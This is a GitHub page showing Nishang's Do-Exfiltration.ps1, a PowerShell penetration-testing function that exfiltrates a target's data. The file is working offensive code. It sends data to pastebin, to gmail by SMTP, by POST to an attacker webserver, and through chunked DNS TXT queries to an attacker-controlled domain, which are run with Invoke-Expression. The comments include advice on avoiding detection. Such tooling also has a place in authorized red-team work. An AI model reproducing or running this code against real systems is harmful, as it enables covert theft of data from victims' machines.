Permalink
Find file
e5ad0a4 Oct 2, 2016
@samratashok @FireFart
175 lines (140 sloc) 5.97 KB
function Do-Exfiltration
{
<#
.SYNOPSIS
Use this script to exfiltrate data from a target.
.DESCRIPTION
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
in Utility folder of Nishang.
.PARAMETER Data
The data to be exfiltrated. Could be supplied by pipeline.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent. The Webserver must beb able to log the POST requests.
The encoded values from the webserver could be decoded bby using Invoke-Decode from Nishang.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to. The DNS Server must log the TXT queries.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName. Using it may increase chances of detection.
Usually, you should let the Name Server of target to resolve things for you.
.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
Use above command for data exfiltration to gmail
.EXAMPLE
PS > Do-Exfiltration -Data (Get-Process) -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above command for data exfiltration to a webserver which logs POST requests.
.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption DNS -DomainName example.com -AuthNS 192.168.254.228
Use above command for data exfiltration to a DNS server which logs TXT queries.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
[AllowEmptyString()]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$dev_key,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$username,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$password,
[Parameter(Position = 5, Mandatory = $False)]
[String]
$URL,
[Parameter(Position = 6, Mandatory = $False)]
[String]
$DomainName,
[Parameter(Position = 7, Mandatory = $False)]
[String]
$AuthNS
)
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$Data | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
$Compressed = [Convert]::ToBase64String($ms.ToArray())
return $Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
$pastename = "Exfiltrated Data"
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = "smtp.gmail.com"
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
$msg.From = "$username@gmail.com"
$msg.To.Add("$username@gmail.com")
$msg.Subject = "Exfiltrated Data"
$msg.Body = $Data
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}